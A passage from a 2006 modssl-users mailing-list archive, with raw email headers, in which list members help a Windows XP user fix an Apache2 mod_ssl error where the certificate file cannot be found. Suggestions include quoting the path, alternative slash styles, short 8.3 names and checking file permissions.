>>> 
>>> 
>>>  SSLEngine On
>>>  SSLCertificateFile conf/ssl/servername.cert
>>>  SSLCertificateKeyFile conf/ssl/servername.key
>>> 
>>> 
>>> Regards,
>>> 
>>> Kevin
>>> 
>>> Asad Habib wrote:
>>>> Hello. I am running Windows XP and I am trying to make Apache2 run with 
>>>> mod_ssl. I have a certificate file and certificate key file in place but 
>>>> when I run Apache I get the following error:
>>>> 
>>>> Syntax error on line 973 of C:/Program Files/Apache2/conf/httpd.conf
>>>> SSLCertificateFile: file 'C:/conf/ssl/servername.cert' does not exist or 
>>>> is empty
>>>> 
>>>> The code for my virtual host directive is as follows:
>>>> 
>>>> 
>>>>    SSLEngine On
>>>>    SSLCertificateFile /conf/ssl/servername.cert
>>>>    SSLCertificateKeyFile /conf/ssl/servername.key
>>>> 
>>>> 
>>>> I lot of folks have had similar problems as I found out through Google, 
>>>> but I have not come across any viable solutions. Your help would be 
>>>> appreciated. Thanks.
>>>> 
>>>> - Asad
>>>> ______________________________________________________________________
>>>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>>> User Support Mailing List                      modssl-users@modssl.org
>>>> Automated List Manager                            majordomo@modssl.org
>>> 
>>> ______________________________________________________________________
>>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>> User Support Mailing List                      modssl-users@modssl.org
>>> Automated List Manager                            majordomo@modssl.org
>>> 
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  8 19:03:25 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 69EDA14D83F; Wed,  8 Mar 2006 19:03:25 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lemonlainey.com (dsl-217-155-103-132.zen.co.uk [217.155.103.132])
	by master.modssl.org (Postfix) with ESMTP id C4DB514D82A
	for ; Wed,  8 Mar 2006 19:03:24 +0100 (CET)
DKIM-Signature: a=rsa-sha1; c=nowsp; d=netsmith.ltd.uk;
	s=MDaemon; t=1141841001; x=1142445801; i=kevin@netsmith.ltd.uk;
	q=dns; h=DomainKey-Signature:Received:Message-ID:Date:From:
	Reply-To:Organization:User-Agent:MIME-Version:To:Subject:
	References:In-Reply-To:Content-Type:Content-Transfer-Encoding;
	b=GKfbEtqa6wyOG62riR8OidU1rlmF8yilKrRtf59y1D+rJ9JM7BF1uE+75oK2vq6g
	ClfAY4khieW9nHRtc6yqOG0xLp6MQM/TBpfSs3yt5za2ctZ7RjsP1N2yl1Wc2XVj
	Qu0BmojVETKsSJoz3w2puVFDNMYyfatvE+X/UnnbETI=
DomainKey-Signature: a=rsa-sha1; s=MDaemon; d=netsmith.ltd.uk;
	c=simple; q=dns; h=from:message-id;
	b=G7RPuTiVhFv4Qf/OrVCxi59gvLRSsyYVQ4Nn3vGorsnDMDdbyonifTl2JHpDGVqk9Z+hj9s8E4Yeqovu6eXbeMku/BSF0O0WtYMy+Bc0HE2qqgbDiOiy56gKynfNymDvKiF4iHMa2LuYFov1eUt50AFDqfwegS6NNMfYZaNGB2M=;
Received: from [217.155.103.138] by lemonlainey.com
	(Cipher TLSv1:RC4-MD5:128) (MDaemon.PRO.v8.1.4.R)
	with ESMTP id md50000285823.msg
	for ; Wed, 08 Mar 2006 18:03:17 +0000
Message-ID: <440F1C65.1000309@netsmith.ltd.uk>
Date: Wed, 08 Mar 2006 18:03:17 +0000
From: Kevin Smith 
Organization: Netsmith Limited
User-Agent: Thunderbird 1.5 (Windows/20051201)
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: Apache with SSL Issue
References:  <440F0D14.3040809@netsmith.ltd.uk>  <440F10DD.503@netsmith.ltd.uk> <440F1471.4020804@werum.de>
In-Reply-To: <440F1471.4020804@werum.de>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Authenticated-Sender: kevin@netsmith.ltd.uk
X-HashCash: 1:20:060308:modssl-users@modssl.org::AeinO24WjZVIwkhL:000000000000000000000000000000000000008kFv
X-Spam-Processed: lemonlainey.com, Wed, 08 Mar 2006 18:03:19 +0000
	(not processed: message from valid local sender)
X-Return-Path: kevin@netsmith.ltd.uk
X-MDaemon-Deliver-To: modssl-users@modssl.org
X-MDAV-Processed: lemonlainey.com, Wed, 08 Mar 2006 18:03:20 +0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kevin Smith 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Yep, as Eckard said, try surrounding the path with " ".

I know if you typed the cd command to get to the path C:/Program 
Files/Apache2/conf/ssl/.cert in a Cmd DOS prompt,  it would produce an 
error.  Surrounding the path with " " would then execute the cd command 
successfully.

Regards,

Kevin

Eckard Wille wrote:
> Kevin Smith schrieb:
>   
>> Probably the best think to do is add the absolute path to the files as:
>>
>> SSLCertificateFile C:/Program Files/Apache2/conf/ssl/servername.cert
>> SSLCertificateKeyFile C:/Program Files/Apache2/conf/ssl/servername.key
>>     
>
> If this still does not work try to surround the path with " ", like this:
>
>   
>> SSLCertificateFile "C:/Program Files/Apache2/conf/ssl/servername.cert"  
>> SSLCertificateKeyFile "C:/Program Files/Apache2/conf/ssl/servername.key"
>>     
>
> Or, even better, put the Apache on a spare unix/linux box. Configuring
> apache/tomcat/mod_jk/whatever is more straightforward there than on a
> windows box.
>
> Greetings from Germany,
> Eckard
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>   

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  8 20:50:09 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 13F5314D83F; Wed,  8 Mar 2006 20:50:09 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lemonlainey.com (dsl-217-155-103-132.zen.co.uk [217.155.103.132])
	by master.modssl.org (Postfix) with ESMTP id 9796214D82A
	for ; Wed,  8 Mar 2006 20:50:08 +0100 (CET)
DKIM-Signature: a=rsa-sha1; c=nowsp; d=netsmith.ltd.uk;
	s=MDaemon; t=1141847404; x=1142452204; i=kevin@netsmith.ltd.uk;
	q=dns; h=DomainKey-Signature:Received:Message-ID:Date:From:
	Reply-To:Organization:User-Agent:MIME-Version:To:Subject:
	References:In-Reply-To:Content-Type:Content-Transfer-Encoding;
	b=oaF7P0kgx9pMtE9pRV19HJIebU6K96wyUYyeH/A0d2ZFKM2x4KbALxixemjys5N6
	jXz6Hwk0X6m8X+OfON3SKKHuONDjAGrj0Ke3z54j2F2bOTR5k6UrTbeIaLbFq7Dc
	ckiqagMlOO5F9EKkRGLZwSEFR08vSBDypgILZhStKQ8=
DomainKey-Signature: a=rsa-sha1; s=MDaemon; d=netsmith.ltd.uk;
	c=simple; q=dns; h=from:message-id;
	b=g+DYoW4NN3k0TP6H2AnPeLggTJQjY19YBheIaDPGyYIkuRTlKEkMoQv6f6mPMQ7qfHUx+A7YNKELulqpaM0pabrENuVR3oqX7w5wpvXG6EDrhlf7LL3bUM2fI0TOAFJxoNV+Fu4Y1FsbBOnazPSVPMtKblHax/BUMlGU0W57B14=;
Received: from [217.155.103.138] by lemonlainey.com
	(Cipher TLSv1:RC4-MD5:128) (MDaemon.PRO.v8.1.4.R)
	with ESMTP id md50000285920.msg
	for ; Wed, 08 Mar 2006 19:50:03 +0000
Message-ID: <440F356A.3000700@netsmith.ltd.uk>
Date: Wed, 08 Mar 2006 19:50:02 +0000
From: Kevin Smith 
Organization: Netsmith Limited
User-Agent: Thunderbird 1.5 (Windows/20051201)
MIME-Version: 1.0
To:  ahabib@engin.umich.edu,  modssl-users@modssl.org
Subject: Re: Apache with SSL Issue
References:  <440F0D14.3040809@netsmith.ltd.uk>  <440F10DD.503@netsmith.ltd.uk> <440F1471.4020804@werum.de> <440F1C65.1000309@netsmith.ltd.uk> 
In-Reply-To: 
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Authenticated-Sender: kevin@netsmith.ltd.uk
X-HashCash: 1:20:060308:modssl-users@modssl.org::yM7d//sAIBTBR0TG:000000000000000000000000000000000000003/+N
X-Spam-Processed: lemonlainey.com, Wed, 08 Mar 2006 19:50:04 +0000
	(not processed: message from valid local sender)
X-Return-Path: kevin@netsmith.ltd.uk
X-MDaemon-Deliver-To: modssl-users@modssl.org
X-MDAV-Processed: lemonlainey.com, Wed, 08 Mar 2006 19:50:04 +0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kevin Smith 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Ok, try the following 3 examples and let me know how it goes.

"C:\Program Files\Apache2\conf\servername.cert"
"C:\\Program Files\\Apache2\\conf\\servername.cert"
"C://Program Files//Apache2//conf//servername.cert"

Kevin

Asad Habib wrote:
> Hi Kevin. I already tried this but it did not work. I got an invalid 
> file path error.
>
> - Asad
>
>
> On Wed, 8 Mar 2006, Kevin Smith wrote:
>
>> Yep, as Eckard said, try surrounding the path with " ".
>>
>> I know if you typed the cd command to get to the path C:/Program 
>> Files/Apache2/conf/ssl/.cert in a Cmd DOS prompt,  it would produce 
>> an error. Surrounding the path with " " would then execute the cd 
>> command successfully.
>>
>> Regards,
>>
>> Kevin
>>
>> Eckard Wille wrote:
>>> Kevin Smith schrieb:
>>>
>>>> Probably the best think to do is add the absolute path to the files 
>>>> as:
>>>>
>>>> SSLCertificateFile C:/Program Files/Apache2/conf/ssl/servername.cert
>>>> SSLCertificateKeyFile C:/Program Files/Apache2/conf/ssl/servername.key
>>>>
>>>
>>> If this still does not work try to surround the path with " ", like 
>>> this:
>>>
>>>
>>>> SSLCertificateFile "C:/Program 
>>>> Files/Apache2/conf/ssl/servername.cert" SSLCertificateKeyFile 
>>>> "C:/Program Files/Apache2/conf/ssl/servername.key"
>>>>
>>>
>>> Or, even better, put the Apache on a spare unix/linux box. Configuring
>>> apache/tomcat/mod_jk/whatever is more straightforward there than on a
>>> windows box.
>>>
>>> Greetings from Germany,
>>> Eckard
>>> ______________________________________________________________________
>>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>> User Support Mailing List                      modssl-users@modssl.org
>>> Automated List Manager                            majordomo@modssl.org
>>>
>>
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  8 22:06:15 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 305C914D83F; Wed,  8 Mar 2006 22:06:15 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.bytepro.net (ftp.glec.com [63.144.102.59])
	by master.modssl.org (Postfix) with ESMTP id 50A0A14D82A
	for ; Wed,  8 Mar 2006 22:06:13 +0100 (CET)
Received: (qmail 10319 invoked by uid 89); 8 Mar 2006 21:06:08 -0000
Received: by simscan 1.1.0 ppid: 10313, pid: 10315, t: 0.0987s
         scanners: attach: 1.1.0 clamav: 0.84/m:32/d:921
Received: from unknown (HELO ?192.168.0.11?) (ken@byte-productions.com@63.149.22.66)
  by 0 with SMTP; 8 Mar 2006 21:06:08 -0000
Mime-Version: 1.0 (Apple Message framework v746.2)
In-Reply-To: <440F356A.3000700@netsmith.ltd.uk>
References:  <440F0D14.3040809@netsmith.ltd.uk>  <440F10DD.503@netsmith.ltd.uk> <440F1471.4020804@werum.de> <440F1C65.1000309@netsmith.ltd.uk>  <440F356A.3000700@netsmith.ltd.uk>
Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed
Message-Id: 
Content-Transfer-Encoding: 7bit
From: Ken Schweigert 
Subject: Re: Apache with SSL Issue
Date: Wed, 8 Mar 2006 16:06:07 -0500
To: modssl-users@modssl.org
X-Mailer: Apple Mail (2.746.2)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ken Schweigert 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mar 8, 2006, at 2:50 PM, Kevin Smith wrote:

> Ok, try the following 3 examples and let me know how it goes.
>
> "C:\Program Files\Apache2\conf\servername.cert"
> "C:\\Program Files\\Apache2\\conf\\servername.cert"
> "C://Program Files//Apache2//conf//servername.cert"
>
> Kevin
>
> Asad Habib wrote:
>> Hi Kevin. I already tried this but it did not work. I got an  
>> invalid file path error.
>>
>> - Asad

This is just a stab in the dark because I haven't been a Windows guy  
for a long time now, but ... aren't Window's paths different because  
of the long filenames?  I seem to remember doing something similar  
once and having to use a tilde.  Something along the lines of:

C:\Program~1\Apache2\...

Hoping this helps.

-ken
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  8 22:08:31 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1190A14D83F; Wed,  8 Mar 2006 22:08:31 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lapis.engin.umich.edu (lapis.engin.umich.edu [141.213.74.22])
	by master.modssl.org (Postfix) with ESMTP id 2C6E114D82A
	for ; Wed,  8 Mar 2006 22:08:29 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by lapis.engin.umich.edu (8.13.5/8.13.5) with ESMTP id k28L8Pes013242;
	Wed, 8 Mar 2006 16:08:25 -0500 (EST)
Date: Wed, 8 Mar 2006 16:08:25 -0500 (EST)
From: Asad Habib 
To: Kevin Smith 
cc: modssl-users@modssl.org
Subject: Re: Apache with SSL Issue
In-Reply-To: <440F356A.3000700@netsmith.ltd.uk>
Message-ID: 
References: 
 <440F0D14.3040809@netsmith.ltd.uk> 
 <440F10DD.503@netsmith.ltd.uk> <440F1471.4020804@werum.de>
 <440F1C65.1000309@netsmith.ltd.uk> 
 <440F356A.3000700@netsmith.ltd.uk>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Asad Habib 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi. I tried all of these but I am still receiving the same error.

- Asad


On Wed, 8 Mar 2006, Kevin Smith wrote:

> Ok, try the following 3 examples and let me know how it goes.
>
> "C:\Program Files\Apache2\conf\servername.cert"
> "C:\\Program Files\\Apache2\\conf\\servername.cert"
> "C://Program Files//Apache2//conf//servername.cert"
>
> Kevin
>
> Asad Habib wrote:
>> Hi Kevin. I already tried this but it did not work. I got an invalid file 
>> path error.
>> 
>> - Asad
>> 
>> 
>> On Wed, 8 Mar 2006, Kevin Smith wrote:
>> 
>>> Yep, as Eckard said, try surrounding the path with " ".
>>> 
>>> I know if you typed the cd command to get to the path C:/Program 
>>> Files/Apache2/conf/ssl/.cert in a Cmd DOS prompt,  it would produce an 
>>> error. Surrounding the path with " " would then execute the cd command 
>>> successfully.
>>> 
>>> Regards,
>>> 
>>> Kevin
>>> 
>>> Eckard Wille wrote:
>>>> Kevin Smith schrieb:
>>>> 
>>>>> Probably the best think to do is add the absolute path to the files 
>>>>> as:
>>>>> 
>>>>> SSLCertificateFile C:/Program Files/Apache2/conf/ssl/servername.cert
>>>>> SSLCertificateKeyFile C:/Program Files/Apache2/conf/ssl/servername.key
>>>>> 
>>>> 
>>>> If this still does not work try to surround the path with " ", like 
>>>> this:
>>>> 
>>>> 
>>>>> SSLCertificateFile "C:/Program Files/Apache2/conf/ssl/servername.cert" 
>>>>> SSLCertificateKeyFile "C:/Program 
>>>>> Files/Apache2/conf/ssl/servername.key"
>>>>> 
>>>> 
>>>> Or, even better, put the Apache on a spare unix/linux box. Configuring
>>>> apache/tomcat/mod_jk/whatever is more straightforward there than on a
>>>> windows box.
>>>> 
>>>> Greetings from Germany,
>>>> Eckard
>>>> ______________________________________________________________________
>>>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>>> User Support Mailing List                      modssl-users@modssl.org
>>>> Automated List Manager                            majordomo@modssl.org
>>>> 
>>> 
>>> ______________________________________________________________________
>>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>> User Support Mailing List                      modssl-users@modssl.org
>>> Automated List Manager                            majordomo@modssl.org
>>> 
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  8 22:13:46 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 109A014D853; Wed,  8 Mar 2006 22:13:46 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from UTM-MAIL08A.mdacc.tmc.edu (utmlnmail08nt.mdacc.tmc.edu [143.111.84.167])
	by master.modssl.org (Postfix) with ESMTP id A08D214D82A;
	Wed,  8 Mar 2006 22:13:44 +0100 (CET)
Subject: Re: Apache with SSL Issue
To: modssl-users@modssl.org
Cc: Kevin Smith ,
	modssl-users@modssl.org,
	owner-modssl-users@modssl.org
X-Mailer: Lotus Notes Release 5.0.11   July 24, 2002
Message-ID: 
From: dpgirago@mdanderson.org
Date: Wed, 8 Mar 2006 15:13:37 -0600
X-MIMETrack: Serialize by Router on UTM-MAIL08A/HOU/UTMDACC(Release 5.0.11  |July 24, 2002) at
 03/08/2006 03:13:42 PM
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: dpgirago@mdanderson.org
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Permissions?

> Hi. I tried all of these but I am still receiving the same error.
>
> - Asad
>

> On Wed, 8 Mar 2006, Kevin Smith wrote:
>>
>> Ok, try the following 3 examples and let me know how it goes.
>>
>> "C:\Program Files\Apache2\conf\servername.cert"
>> "C:\\Program Files\\Apache2\\conf\\servername.cert"
>> "C://Program Files//Apache2//conf//servername.cert"
>>
>> Kevin
>>
>> Asad Habib wrote:
>>> Hi Kevin. I already tried this but it did not work. I got an invalid
file
>>> path error.
>>>
>>> - Asad

...


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  8 22:14:01 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8CB3E14D9F5; Wed,  8 Mar 2006 22:14:01 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from dreadnought.cnchost.com (dreadnought.cnchost.com [207.155.248.18])
	by master.modssl.org (Postfix) with ESMTP id CB10014D9F2
	for ; Wed,  8 Mar 2006 22:14:00 +0100 (CET)
Received: from [192.168.0.21] (c-24-13-128-132.hsd1.il.comcast.net [24.13.128.132])
	by dreadnought.cnchost.com
	id QAA06654; Wed, 8 Mar 2006 16:13:49 -0500 (EST)
	[ConcentricHost SMTP Relay 1.17]
Message-ID: <440F4877.4060903@rowe-clan.net>
Date: Wed, 08 Mar 2006 15:11:19 -0600
From: "William A. Rowe, Jr." 
User-Agent: Mozilla Thunderbird 1.0.7-1.1.fc3 (X11/20050929)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache with SSL Issue
References:  <440F0D14.3040809@netsmith.ltd.uk>  <440F10DD.503@netsmith.ltd.uk> <440F1471.4020804@werum.de>
In-Reply-To: <440F1471.4020804@werum.de>
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "William A. Rowe, Jr." 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Eckard Wille wrote:
> Kevin Smith schrieb:
> 
>>Probably the best think to do is add the absolute path to the files as:
>>
>>SSLCertificateFile C:/Program Files/Apache2/conf/ssl/servername.cert
>>SSLCertificateKeyFile C:/Program Files/Apache2/conf/ssl/servername.key
> 
> 
> If this still does not work try to surround the path with " ", like this:
> 
>SSLCertificateFile "C:/Program Files/Apache2/conf/ssl/servername.cert"  
>SSLCertificateKeyFile "C:/Program Files/Apache2/conf/ssl/servername.key"

Yup.  Why do people confuse this issue with Windows?  It's the same problem
as unix if you name your config path "/usr/apache/ssl keys/"  Quote it.

:)
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  8 22:22:58 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3F94614D853; Wed,  8 Mar 2006 22:22:58 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lapis.engin.umich.edu (lapis.engin.umich.edu [141.213.74.22])
	by master.modssl.org (Postfix) with ESMTP id B5D0A14D83E
	for ; Wed,  8 Mar 2006 22:22:57 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by lapis.engin.umich.edu (8.13.5/8.13.5) with ESMTP id k28LMqHX014239;
	Wed, 8 Mar 2006 16:22:52 -0500 (EST)
Date: Wed, 8 Mar 2006 16:22:52 -0500 (EST)
From: Asad Habib 
To: Ken Schweigert 
cc: modssl-users@modssl.org
Subject: Re: Apache with SSL Issue
In-Reply-To: 
Message-ID: 
References: 
 <440F0D14.3040809@netsmith.ltd.uk> 
 <440F10DD.503@netsmith.ltd.uk> <440F1471.4020804@werum.de>
 <440F1C65.1000309@netsmith.ltd.uk> 
 <440F356A.3000700@netsmith.ltd.uk> 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Asad Habib 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi. Thanks for your input. By placing a tilde between Program and Files to 
bridge the space, the path was recognized as a valid one when placed in 
double quotes. However, the certificate is still inaccessible.

- Asad


On Wed, 8 Mar 2006, Ken Schweigert wrote:

> On Mar 8, 2006, at 2:50 PM, Kevin Smith wrote:
>
>> Ok, try the following 3 examples and let me know how it goes.
>> 
>> "C:\Program Files\Apache2\conf\servername.cert"
>> "C:\\Program Files\\Apache2\\conf\\servername.cert"
>> "C://Program Files//Apache2//conf//servername.cert"
>> 
>> Kevin
>> 
>> Asad Habib wrote:
>>> Hi Kevin. I already tried this but it did not work. I got an invalid 
>>> file path error.
>>> 
>>> - Asad
>
> This is just a stab in the dark because I haven't been a Windows guy for a 
> long time now, but ... aren't Window's paths different because of the long 
> filenames?  I seem to remember doing something similar once and having to 
> use a tilde.  Something along the lines of:
>
> C:\Program~1\Apache2\...
>
> Hoping this helps.
>
> -ken
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  8 22:23:15 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4650A14D9F8; Wed,  8 Mar 2006 22:23:15 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from tam.tigertail.net (adslr027.serve.net [66.114.248.155])
	by master.modssl.org (Postfix) with ESMTP id 87A2914D9CE
	for ; Wed,  8 Mar 2006 22:23:13 +0100 (CET)
Received: from [192.168.0.3] (tan [192.168.0.3])
	by tam.tigertail.net (8.12.8/8.12.8) with ESMTP id k28LN9V5001482
	for ; Wed, 8 Mar 2006 13:23:09 -0800
Message-ID: <440F4B3D.5070007@zis.com>
Date: Wed, 08 Mar 2006 13:23:09 -0800
From: Robert Uzgalis 
User-Agent: Thunderbird 1.5 (Windows/20051201)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache with SSL Issue
References: 
In-Reply-To: 
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robert Uzgalis 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

If this is Win XP try looking at protections.  Does Apache have the 
right to read the file?

dpgirago@mdanderson.org wrote:
> Permissions?
> 
>> Hi. I tried all of these but I am still receiving the same error.
>>
>> - Asad
>>
> 
>> On Wed, 8 Mar 2006, Kevin Smith wrote:
>>> Ok, try the following 3 examples and let me know how it goes.
>>>
>>> "C:\Program Files\Apache2\conf\servername.cert"
>>> "C:\\Program Files\\Apache2\\conf\\servername.cert"
>>> "C://Program Files//Apache2//conf//servername.cert"
>>>
>>> Kevin
>>>
>>> Asad Habib wrote:
>>>> Hi Kevin. I already tried this but it did not work. I got an invalid
> file
>>>> path error.
>>>>
>>>> - Asad
> 
> ...
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  8 22:32:07 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 38C1D14D83F; Wed,  8 Mar 2006 22:32:07 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lapis.engin.umich.edu (lapis.engin.umich.edu [141.213.74.22])
	by master.modssl.org (Postfix) with ESMTP id 4F4A714D82A
	for ; Wed,  8 Mar 2006 22:32:03 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by lapis.engin.umich.edu (8.13.5/8.13.5) with ESMTP id k28LOSOE014263;
	Wed, 8 Mar 2006 16:24:28 -0500 (EST)
Date: Wed, 8 Mar 2006 16:24:28 -0500 (EST)
From: Asad Habib 
To: dpgirago@mdanderson.org
cc: modssl-users@modssl.org
Subject: Re: Apache with SSL Issue
In-Reply-To: 
Message-ID: 
References: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Asad Habib 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello. I have modified permissions so that any user can access both the 
cert and key file. Offcourse, I will change this once I get SSL running.

- Asad


On Wed, 8 Mar 2006, dpgirago@mdanderson.org wrote:

>
> Permissions?
>
>> Hi. I tried all of these but I am still receiving the same error.
>>
>> - Asad
>>
>
>> On Wed, 8 Mar 2006, Kevin Smith wrote:
>>>
>>> Ok, try the following 3 examples and let me know how it goes.
>>>
>>> "C:\Program Files\Apache2\conf\servername.cert"
>>> "C:\\Program Files\\Apache2\\conf\\servername.cert"
>>> "C://Program Files//Apache2//conf//servername.cert"
>>>
>>> Kevin
>>>
>>> Asad Habib wrote:
>>>> Hi Kevin. I already tried this but it did not work. I got an invalid
> file
>>>> path error.
>>>>
>>>> - Asad
>
> ...
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
